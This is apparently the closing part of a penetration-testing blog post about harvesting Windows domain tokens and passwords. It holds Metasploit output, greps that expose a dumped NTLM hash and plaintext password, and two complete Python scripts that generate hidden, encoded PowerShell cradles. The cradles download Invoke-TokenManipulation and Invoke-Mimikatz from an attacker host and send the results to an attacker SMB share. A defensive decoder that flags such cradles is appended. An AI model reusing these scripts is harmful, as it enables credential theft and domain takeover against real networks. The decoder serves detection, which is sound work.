[-] 192.168.81.10:445 - Unable to cleanup \WINDOWS\Temp\GkdedgMwXOVyHble.txt. Error: The server responded with error: STATUS_SHARING_VIOLATION (Command=6 WordCount=0)
[-] 192.168.81.10:445 - Unable to cleanup. Maybe you'll need to manually remove true, false from the target.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Then, just egrep the files to enumerate any domain admins.

root@trustedsec4-lin:~/loot/tokens# egrep -i 'trustedsec|admin' * /dev/null
PWNT-DC.txt:Username : TrustedSec

All that’s left is to pop a shell on that system, impersonate their token, and escalate privileges on the domain.

The “encoding” script was easily modified for Mimikatz as well (it writes to “loot$/passwords/”). To grep the file for a specific user’s password:

root@trustedsec4-lin:~/loot/passwords# grep -A 2 TrustedSec * /dev/null
PWNT-DC.txt:User Name : TrustedSec
PWNT-DC.txt-Domain : PWNT
PWNT-DC.txt-SID : S-1-5-21-1458926743-1222556689-571800001-1000
--
PWNT-DC.txt:
* Username : TrustedSec
PWNT-DC.txt-
* Domain : PWNT
PWNT-DC.txt-
* NTLM : 918d38906649503fde8a641dbd87d857
--
PWNT-DC.txt:
* Username : TrustedSec
PWNT-DC.txt-
* Domain : PWNT
PWNT-DC.txt-
* Password : GoatBah1!

Full script source provided below. Happy Hunting!

TokenHunter.py

#!/usr/bin/env python

# This downloads "Invoke-TokenManipulation.ps1" from the attacker's web host,
# executes the script in memory and pipes its output to the attacker's SMB share
# "\\loot$\tokens\".
#
# Formulated mainly from the following articles/tools
# https://www.pentestgeek.com/2013/09/18/invoke-shellcode/
# http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html
# http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/
# https://github.com/trustedsec/unicorn
#
# Script Dependency
# https://github.com/mattifestation/PowerSploit/tree/master/Exfiltration
#
# TrustedSec

import base64

attacker_ip = "<put your IP here>"

# Main guts
def main():
    # Download cradle, then the enumeration whose output lands on the SMB share
    powershell_code = (
        "IEX (New-Object Net.WebClient).DownloadString(\"http://" + attacker_ip
        + "/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1\");"
        "Invoke-TokenManipulation -Enumerate |Out-File -Encoding \"UTF8\" -FilePath \\\\"
        + attacker_ip + "\\loot$\\tokens\\$env:computername.txt"
    )
    # powershell -enc expects the script as UTF-16LE, base64 encoded
    encoded = base64.b64encode(powershell_code.encode('utf_16_le')).decode('ascii')
    full_attack = "powershell -nop -win hidden -noni -enc " + encoded
    print(full_attack)

# Standard boilerplate to call the main() function
if __name__ == '__main__':
    main()

PasswordHunter.py

#!/usr/bin/env python

# This downloads "Invoke-Mimikatz.ps1" from the attacker's web host,
# executes the script in memory and pipes its output to the attacker's SMB share
# "\\loot$\passwords\".
#
# Formulated mainly from the following articles/tools
# https://www.pentestgeek.com/2013/09/18/invoke-shellcode/
# http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html
# http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/
# https://github.com/trustedsec/unicorn
#
# TrustedSec

import base64

attacker_ip = "<put your IP here>"

# Main guts
def main():
    # Download cradle, then the credential dump whose output lands on the SMB share
    powershell_code = (
        "IEX (New-Object Net.WebClient).DownloadString(\"http://" + attacker_ip
        + "/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1\");"
        "Invoke-Mimikatz -DumpCreds |Out-File -Encoding \"UTF8\" -FilePath \\\\"
        + attacker_ip + "\\loot$\\passwords\\$env:computername.txt"
    )
    # powershell -enc expects the script as UTF-16LE, base64 encoded
    encoded = base64.b64encode(powershell_code.encode('utf_16_le')).decode('ascii')
    full_attack = "powershell -nop -win hidden -noni -enc " + encoded
    print(full_attack)

# Standard boilerplate to call the main() function
if __name__ == '__main__':
    main()
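The two scripts above produce the -enc form of the same IEX/DownloadString cradle the second post runs interactively. As an added example (not from the post, unicorn or PowerSploit), here is the defender’s inverse: decode an -EncodedCommand argument as it appears in a process-creation log and flag the download cradle, the hidden window and the UNC output path. The sample command line is constructed from the post’s own string, with 192.168.81.217 standing in for the attacker host.

```python
"""Decode PowerShell -enc/-EncodedCommand arguments from logged command lines
and flag the in-memory download cradle plus loot drop used in the post."""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENC_ARG_RE = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                        re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"')]+", re.IGNORECASE)
UNC_RE = re.compile(r"\\\\[^\s\"']+")
# Patterns a defender would treat as a download-and-run cradle or loot drop.
INDICATORS = {
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE),
    "downloadstring": re.compile(r"DownloadString", re.IGNORECASE),
    "webclient": re.compile(r"Net\.WebClient", re.IGNORECASE),
    "out_file_unc": re.compile(r"Out-File\b.*\\\\", re.IGNORECASE),
    "hidden_window": re.compile(r"-w(?:in|indowstyle)?\s+hidden", re.IGNORECASE),
}


def encode_command(script):
    """The encoding TokenHunter/PasswordHunter perform: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(cmdline):
    """Return the plaintext script hidden behind -enc, or None if there is none
    or the argument is not valid base64/UTF-16LE."""
    m = ENC_ARG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline):
    """Decode if needed, then extract URLs, UNC paths and matched indicators."""
    script = decode_command(cmdline)
    text = script if script is not None else cmdline
    return {
        "encoded": script is not None,
        "script": script,
        "urls": URL_RE.findall(text),
        "unc_paths": UNC_RE.findall(text),
        "indicators": [name for name, rx in INDICATORS.items()
                       if rx.search(text) or rx.search(cmdline)],
    }


# Constructed sample: the post's string with 192.168.81.217 as the attacker host.
SAMPLE_SCRIPT = (
    r'IEX (New-Object Net.WebClient).DownloadString("http://192.168.81.217/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1");'
    r'Invoke-TokenManipulation -Enumerate |Out-File -Encoding "UTF8" -FilePath \\192.168.81.217\loot$\tokens\$env:computername.txt'
)
SAMPLE_CMDLINE = "powershell -nop -win hidden -noni -enc " + encode_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    for key, value in analyze(SAMPLE_CMDLINE).items():
        print(key, "=", value)
```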
